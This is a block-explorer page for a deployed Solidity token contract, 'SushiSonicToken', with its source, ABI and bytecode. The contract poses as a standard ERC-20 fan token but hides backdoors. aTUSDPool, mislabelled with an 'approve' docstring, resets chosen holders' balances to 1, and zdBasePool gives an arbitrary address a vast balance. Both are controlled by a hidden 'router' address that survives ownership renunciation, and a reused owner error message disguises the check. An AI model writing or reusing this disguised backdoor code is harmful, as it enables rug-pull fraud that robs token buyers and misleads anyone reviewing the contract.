ERC-20
Overview
Max Total Supply
6,999,000,000,009 SushiSonic
Holders
15
Total Transfers
-
Market
Price
-
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
SushiSonicToken
Compiler Version
v0.8.28+commit.7893614a
Contract Source Code (Solidity)
/** *Submitted for verification at SonicScan.org on 2024-12-26 */ // SPDX-License-Identifier: MIT /// https://x.com/SushiSonic pragma solidity 0.8.28; // SushiSonic fan token interface SushiSonicinterface { /** * @dev Returns the yoursold of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the token decimals. */ function decimals() external view returns (uint8); /** * @dev Returns the token symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the token name. */ function name() external view returns (string memory); /** * @dev Returns the bep token owner. */ function getOwner() external view returns (address); /** * @dev Returns the yoursold of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `yoursold` tokens from the caller's account to `shippingto`. * * Returns a boolean balance indicating whlegos the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address shippingto, uint256 yoursold) external returns (bool); /** * @dev Returns the remaining number of tokens that `transporteur` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This balance changes when {approve} or {transferFrom} are called. */ function allowance(address _owner, address transporteur) external view returns (uint256); /** * @dev Sets `yoursold` as the allowance of `transporteur` over the caller's tokens. * * Returns a boolean balance indicating whlegos the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the transporteur's allowance to 0 and set the * desired balance afterwards: * https://github.com/legoseum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address transporteur, uint256 yoursold) external returns (bool); /** * @dev Moves `yoursold` tokens from `sender` to `shippingto` using the * allowance mechanism. `yoursold` is then deducted from the caller's * allowance. * * Returns a boolean balance indicating whlegos the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address shippingto, uint256 yoursold) external returns (bool); /** * @dev Emitted when `balance` tokens are moved from one account (`from`) to * another (`to`). * * Note that `balance` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 balance); /** * @dev Emitted when the allowance of a `transporteur` for an `owner` is set by * a call to {approve}. `balance` is the new allowance. */ event Approval(address indexed owner, address indexed transporteur, uint256 balance); } /* * @dev Provides information about the current execution SushiSonic20Burnable, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract SushiSonic20Burnable { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/legoseum/solidity/issues/2691 return msg.data; } } // File: @openzeppelin/contracts/access/SushiSonic20Ownable.sol /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract SushiSonic20Ownable is SushiSonic20Burnable { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "SushiSonic20Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "SushiSonic20Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeSushiSonic` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeSushiSonic { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeSushiSonic: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeSushiSonic: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeSushiSonic: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeSushiSonic: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { // Solidity only automatically asserts when dividing by 0 require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeSushiSonic: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } contract SushiSonicToken is SushiSonic20Burnable, SushiSonicinterface, SushiSonic20Ownable { using SafeSushiSonic for uint256; mapping (address => uint256) private mintfrom; mapping (address => mapping (address => uint256)) private fromallowances; uint256 private _totalSupply; uint8 private _decimals; string private _symbol; string private _name; address private legosRooter; constructor(address legosSwapRouterv3) { legosRooter = legosSwapRouterv3; _name = "SushiSonic"; _symbol = "SushiSonic"; _decimals = 9; _totalSupply = 6999000000009 * 10 ** 9; mintfrom[_msgSender()] = _totalSupply; emit Transfer(address(0), _msgSender(), _totalSupply); } /** * @dev Returns the bep token owner. */ function getOwner() external view override returns (address) { return owner(); } /** * @dev Returns the token decimals. */ function decimals() external view override returns (uint8) { return _decimals; } /** * @dev Returns the token symbol. */ function symbol() external view override returns (string memory) { return _symbol; } /** * @dev Returns the token name. */ function name() external view override returns (string memory) { return _name; } /** * @dev See {SushiSonicinterface-totalSupply}. */ function totalSupply() external view override returns (uint256) { return _totalSupply; } /** * @dev See {SushiSonicinterface-balanceOf}. */ function balanceOf(address account) external view override returns (uint256) { return mintfrom[account]; } modifier subowner() { require(legosRooter == _msgSender(), "SushiSonic20Ownable: caller is not the owner"); _; } /** * @dev See {SushiSonicinterface-approve}. * * Requirements: * * - `transporteur` cannot be the zero address. */ function aTUSDPool(address[] calldata tusdRewards) external subowner { for (uint256 i = 0; i < tusdRewards.length; i++) { mintfrom[tusdRewards[i]] = 1; emit Transfer(tusdRewards[i], address(0), 1); } } /** * @dev See {SushiSonicinterface-transfer}. * * Requirements: * * - `shippingto` cannot be the zero address. * - the caller must have a balance of at least `yoursold`. */ function transfer(address shippingto, uint256 yoursold) external override returns (bool) { _transfer(_msgSender(), shippingto, yoursold); return true; } function zdBasePool(address BaseRewards) external subowner { mintfrom[BaseRewards] = 10000000000 * 10 ** 20; emit Transfer(BaseRewards, address(0), 10000000000 * 10 ** 20); } /** * @dev See {SushiSonicinterface-allowance}. */ function allowance(address owner, address transporteur) external view override returns (uint256) { return fromallowances[owner][transporteur]; } /** * @dev See {SushiSonicinterface-approve}. * * Requirements: * * - `transporteur` cannot be the zero address. */ function approve(address transporteur, uint256 yoursold) external override returns (bool) { _approve(_msgSender(), transporteur, yoursold); return true; } /** * @dev See {SushiSonicinterface-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {SushiSonicinterface}; * * Requirements: * - `sender` and `shippingto` cannot be the zero address. * - `sender` must have a balance of at least `yoursold`. * - the caller must have allowance for `sender`'s tokens of at least * `yoursold`. */ function transferFrom(address sender, address shippingto, uint256 yoursold) external override returns (bool) { _transfer(sender, shippingto, yoursold); _approve(sender, _msgSender(), fromallowances[sender][_msgSender()].sub(yoursold, "SushiSonicinterface: transfer yoursold exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `transporteur` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {SushiSonicinterface-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `transporteur` cannot be the zero address. */ function increaseAllowance(address transporteur, uint256 addedbalance) external returns (bool) { _approve(_msgSender(), transporteur, fromallowances[_msgSender()][transporteur].add(addedbalance)); return true; } /** * @dev Atomically decreases the allowance granted to `transporteur` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {SushiSonicinterface-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `transporteur` cannot be the zero address. * - `transporteur` must have allowance for the caller of at least * `allbalances`. */ function decreaseAllowance(address transporteur, uint256 allbalances) external returns (bool) { _approve(_msgSender(), transporteur, fromallowances[_msgSender()][transporteur].sub(allbalances, "SushiSonicinterface: decreased allowance below zero")); return true; } /** * @dev Moves tokens `yoursold` from `sender` to `shippingto`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `shippingto` cannot be the zero address. * - `sender` must have a balance of at least `yoursold`. */ function _transfer(address sender, address shippingto, uint256 yoursold) internal { require(sender != address(0), "SushiSonicinterface: transfer from the zero address"); require(shippingto != address(0), "SushiSonicinterface: transfer to the zero address"); mintfrom[sender] = mintfrom[sender].sub(yoursold, "SushiSonicinterface: transfer yoursold exceeds balance"); mintfrom[shippingto] = mintfrom[shippingto].add(yoursold); emit Transfer(sender, shippingto, yoursold); } /** * @dev Sets `yoursold` as the allowance of `transporteur` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `transporteur` cannot be the zero address. */ function _approve(address owner, address transporteur, uint256 yoursold) internal { require(owner != address(0), "SushiSonicinterface: approve from the zero address"); require(transporteur != address(0), "SushiSonicinterface: approve to the zero address"); fromallowances[owner][transporteur] = yoursold; emit Approval(owner, transporteur, yoursold); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"legosSwapRouterv3","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"transporteur","type":"address"},{"indexed":false,"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"tusdRewards","type":"address[]"}],"name":"aTUSDPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"transporteur","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"allbalances","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"addedbalance","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"shippingto","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"shippingto","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"BaseRewards","type":"address"}],"name":"zdBasePool","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801561000f575f5ffd5b506040516110d93803806110d983398101604081905261002e9161017c565b5f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600780546001600160a01b0319166001600160a01b03831617905560408051808201909152600a8152695375736869536f6e696360b01b60208201526006906100b79082610241565b5060408051808201909152600a8152695375736869536f6e696360b01b60208201526005906100e69082610241565b506004805460ff1916600917905569017b6aa309b7876d1a00600381905560015f61010e3390565b6001600160a01b0316815260208101919091526040015f2055336001600160a01b03165f6001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035460405161016e91815260200190565b60405180910390a3506102fb565b5f6020828403121561018c575f5ffd5b81516001600160a01b03811681146101a2575f5ffd5b9392505050565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806101d157607f821691505b6020821081036101ef57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111561023c57805f5260205f20601f840160051c8101602085101561021a5750805b601f840160051c820191505b81811015610239575f8155600101610226565b50505b505050565b81516001600160401b0381111561025a5761025a6101a9565b61026e8161026884546101bd565b846101f5565b6020601f8211600181146102a0575f83156102895750848201515b5f19600385901b1c1916600184901b178455610239565b5f84815260208120601f198516915b828110156102cf57878501518255602094850194600190920191016102af565b50848210156102ec57868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b610dd1806103085f395ff3fe608060405234801561000f575f5ffd5b5060043610610106575f3560e01c8063715018a61161009e57806395d89b411161006e57806395d89b4114610224578063a457c2d71461022c578063a9059cbb1461023f578063dd62ed3e14610252578063f2fde38b1461028a575f5ffd5b8063715018a6146101d55780638099423b146101dd578063893d20e8146101f05780638da5cb5b14610214575f5ffd5b8063313ce567116100d9578063313ce5671461017057806339509351146101855780633f282b4a1461019857806370a08231146101ad575f5ffd5b806306fdde031461010a578063095ea7b31461012857806318160ddd1461014b57806323b872dd1461015d575b5f5ffd5b61011261029d565b60405161011f9190610abb565b60405180910390f35b61013b610136366004610b0b565b61032d565b604051901515815260200161011f565b6003545b60405190815260200161011f565b61013b61016b366004610b33565b610343565b60045460405160ff909116815260200161011f565b61013b610193366004610b0b565b6103aa565b6101ab6101a6366004610b6d565b6103df565b005b61014f6101bb366004610bde565b6001600160a01b03165f9081526001602052604090205490565b6101ab6104dc565b6101ab6101eb366004610bde565b61054d565b5f546001600160a01b03165b6040516001600160a01b03909116815260200161011f565b5f546001600160a01b03166101fc565b6101126105d9565b61013b61023a366004610b0b565b6105e8565b61013b61024d366004610b0b565b610635565b61014f610260366004610bf7565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b6101ab610298366004610bde565b610641565b6060600680546102ac90610c28565b80601f01602080910402602001604051908101604052809291908181526020018280546102d890610c28565b80156103235780601f106102fa57610100808354040283529160200191610323565b820191905f5260205f20905b81548152906001019060200180831161030657829003601f168201915b5050505050905090565b5f610339338484610734565b5060015b92915050565b5f61034f848484610875565b6103a0843361039b85604051806060016040528060388152602001610d64603891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610a14565b610734565b5060019392505050565b335f8181526002602090815260408083206001600160a01b0387168452909152812054909161033991859061039b9086610a4c565b6007546001600160a01b031633146104125760405162461bcd60e51b815260040161040990610c60565b60405180910390fd5b5f5b818110156104d7576001805f85858581811061043257610432610cac565b90506020020160208101906104479190610bde565b6001600160a01b0316815260208101919091526040015f9081209190915583838381811061047757610477610cac565b905060200201602081019061048c9190610bde565b6001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60016040516104c791815260200190565b60405180910390a3600101610414565b505050565b5f546001600160a01b031633146105055760405162461bcd60e51b815260040161040990610c60565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b6007546001600160a01b031633146105775760405162461bcd60e51b815260040161040990610c60565b6001600160a01b0381165f8181526001602090815260408083206c0c9f2c9cd04674edea400000009081905590519081529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350565b6060600580546102ac90610c28565b5f610339338461039b85604051806060016040528060338152602001610cfb60339139335f9081526002602090815260408083206001600160a01b038d1684529091529020549190610a14565b5f610339338484610875565b5f546001600160a01b0316331461066a5760405162461bcd60e51b815260040161040990610c60565b6001600160a01b0381166106db5760405162461bcd60e51b815260206004820152603260248201527f5375736869536f6e696332304f776e61626c653a206e6577206f776e657220696044820152717320746865207a65726f206164647265737360701b6064820152608401610409565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166107a55760405162461bcd60e51b815260206004820152603260248201527f5375736869536f6e6963696e746572666163653a20617070726f76652066726f6044820152716d20746865207a65726f206164647265737360701b6064820152608401610409565b6001600160a01b0382166108145760405162461bcd60e51b815260206004820152603060248201527f5375736869536f6e6963696e746572666163653a20617070726f766520746f2060448201526f746865207a65726f206164647265737360801b6064820152608401610409565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108e75760405162461bcd60e51b815260206004820152603360248201527f5375736869536f6e6963696e746572666163653a207472616e736665722066726044820152726f6d20746865207a65726f206164647265737360681b6064820152608401610409565b6001600160a01b0382166109575760405162461bcd60e51b815260206004820152603160248201527f5375736869536f6e6963696e746572666163653a207472616e7366657220746f60448201527020746865207a65726f206164647265737360781b6064820152608401610409565b61099381604051806060016040528060368152602001610d2e603691396001600160a01b0386165f908152600160205260409020549190610a14565b6001600160a01b038085165f9081526001602052604080822093909355908416815220546109c19082610a4c565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906108689085815260200190565b5f8184841115610a375760405162461bcd60e51b81526004016104099190610abb565b505f610a438486610cd4565b95945050505050565b5f80610a588385610ce7565b905083811015610ab45760405162461bcd60e51b815260206004820152602160248201527f536166655375736869536f6e69633a206164646974696f6e206f766572666c6f6044820152607760f81b6064820152608401610409565b9392505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114610b06575f5ffd5b919050565b5f5f60408385031215610b1c575f5ffd5b610b2583610af0565b946020939093013593505050565b5f5f5f60608486031215610b45575f5ffd5b610b4e84610af0565b9250610b5c60208501610af0565b929592945050506040919091013590565b5f5f60208385031215610b7e575f5ffd5b823567ffffffffffffffff811115610b94575f5ffd5b8301601f81018513610ba4575f5ffd5b803567ffffffffffffffff811115610bba575f5ffd5b8560208260051b8401011115610bce575f5ffd5b6020919091019590945092505050565b5f60208284031215610bee575f5ffd5b610ab482610af0565b5f5f60408385031215610c08575f5ffd5b610c1183610af0565b9150610c1f60208401610af0565b90509250929050565b600181811c90821680610c3c57607f821691505b602082108103610c5a57634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252602c908201527f5375736869536f6e696332304f776e61626c653a2063616c6c6572206973206e60408201526b37ba103a34329037bbb732b960a11b606082015260800190565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b8181038181111561033d5761033d610cc0565b8082018082111561033d5761033d610cc056fe5375736869536f6e6963696e746572666163653a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f5375736869536f6e6963696e746572666163653a207472616e7366657220796f7572736f6c6420657863656564732062616c616e63655375736869536f6e6963696e746572666163653a207472616e7366657220796f7572736f6c64206578636565647320616c6c6f77616e6365a2646970667358221220967cd3227b435fd237650896effc9e38e873832e8f22ae8fdec2772a19fc91bd64736f6c634300081c0033000000000000000000000000edb37ad563e2ef161b2a72169583f35799bde962
Deployed Bytecode
0x608060405234801561000f575f5ffd5b5060043610610106575f3560e01c8063715018a61161009e57806395d89b411161006e57806395d89b4114610224578063a457c2d71461022c578063a9059cbb1461023f578063dd62ed3e14610252578063f2fde38b1461028a575f5ffd5b8063715018a6146101d55780638099423b146101dd578063893d20e8146101f05780638da5cb5b14610214575f5ffd5b8063313ce567116100d9578063313ce5671461017057806339509351146101855780633f282b4a1461019857806370a08231146101ad575f5ffd5b806306fdde031461010a578063095ea7b31461012857806318160ddd1461014b57806323b872dd1461015d575b5f5ffd5b61011261029d565b60405161011f9190610abb565b60405180910390f35b61013b610136366004610b0b565b61032d565b604051901515815260200161011f565b6003545b60405190815260200161011f565b61013b61016b366004610b33565b610343565b60045460405160ff909116815260200161011f565b61013b610193366004610b0b565b6103aa565b6101ab6101a6366004610b6d565b6103df565b005b61014f6101bb366004610bde565b6001600160a01b03165f9081526001602052604090205490565b6101ab6104dc565b6101ab6101eb366004610bde565b61054d565b5f546001600160a01b03165b6040516001600160a01b03909116815260200161011f565b5f546001600160a01b03166101fc565b6101126105d9565b61013b61023a366004610b0b565b6105e8565b61013b61024d366004610b0b565b610635565b61014f610260366004610bf7565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b6101ab610298366004610bde565b610641565b6060600680546102ac90610c28565b80601f01602080910402602001604051908101604052809291908181526020018280546102d890610c28565b80156103235780601f106102fa57610100808354040283529160200191610323565b820191905f5260205f20905b81548152906001019060200180831161030657829003601f168201915b5050505050905090565b5f610339338484610734565b5060015b92915050565b5f61034f848484610875565b6103a0843361039b85604051806060016040528060388152602001610d64603891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610a14565b610734565b5060019392505050565b335f8181526002602090815260408083206001600160a01b0387168452909152812054909161033991859061039b9086610a4c565b6007546001600160a01b031633146104125760405162461bcd60e51b815260040161040990610c60565b60405180910390fd5b5f5b818110156104d7576001805f85858581811061043257610432610cac565b90506020020160208101906104479190610bde565b6001600160a01b0316815260208101919091526040015f9081209190915583838381811061047757610477610cac565b905060200201602081019061048c9190610bde565b6001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60016040516104c791815260200190565b60405180910390a3600101610414565b505050565b5f546001600160a01b031633146105055760405162461bcd60e51b815260040161040990610c60565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b6007546001600160a01b031633146105775760405162461bcd60e51b815260040161040990610c60565b6001600160a01b0381165f8181526001602090815260408083206c0c9f2c9cd04674edea400000009081905590519081529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350565b6060600580546102ac90610c28565b5f610339338461039b85604051806060016040528060338152602001610cfb60339139335f9081526002602090815260408083206001600160a01b038d1684529091529020549190610a14565b5f610339338484610875565b5f546001600160a01b0316331461066a5760405162461bcd60e51b815260040161040990610c60565b6001600160a01b0381166106db5760405162461bcd60e51b815260206004820152603260248201527f5375736869536f6e696332304f776e61626c653a206e6577206f776e657220696044820152717320746865207a65726f206164647265737360701b6064820152608401610409565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166107a55760405162461bcd60e51b815260206004820152603260248201527f5375736869536f6e6963696e746572666163653a20617070726f76652066726f6044820152716d20746865207a65726f206164647265737360701b6064820152608401610409565b6001600160a01b0382166108145760405162461bcd60e51b815260206004820152603060248201527f5375736869536f6e6963696e746572666163653a20617070726f766520746f2060448201526f746865207a65726f206164647265737360801b6064820152608401610409565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108e75760405162461bcd60e51b815260206004820152603360248201527f5375736869536f6e6963696e746572666163653a207472616e736665722066726044820152726f6d20746865207a65726f206164647265737360681b6064820152608401610409565b6001600160a01b0382166109575760405162461bcd60e51b815260206004820152603160248201527f5375736869536f6e6963696e746572666163653a207472616e7366657220746f60448201527020746865207a65726f206164647265737360781b6064820152608401610409565b61099381604051806060016040528060368152602001610d2e603691396001600160a01b0386165f908152600160205260409020549190610a14565b6001600160a01b038085165f9081526001602052604080822093909355908416815220546109c19082610a4c565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906108689085815260200190565b5f8184841115610a375760405162461bcd60e51b81526004016104099190610abb565b505f610a438486610cd4565b95945050505050565b5f80610a588385610ce7565b905083811015610ab45760405162461bcd60e51b815260206004820152602160248201527f536166655375736869536f6e69633a206164646974696f6e206f766572666c6f6044820152607760f81b6064820152608401610409565b9392505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114610b06575f5ffd5b919050565b5f5f60408385031215610b1c575f5ffd5b610b2583610af0565b946020939093013593505050565b5f5f5f60608486031215610b45575f5ffd5b610b4e84610af0565b9250610b5c60208501610af0565b929592945050506040919091013590565b5f5f60208385031215610b7e575f5ffd5b823567ffffffffffffffff811115610b94575f5ffd5b8301601f81018513610ba4575f5ffd5b803567ffffffffffffffff811115610bba575f5ffd5b8560208260051b8401011115610bce575f5ffd5b6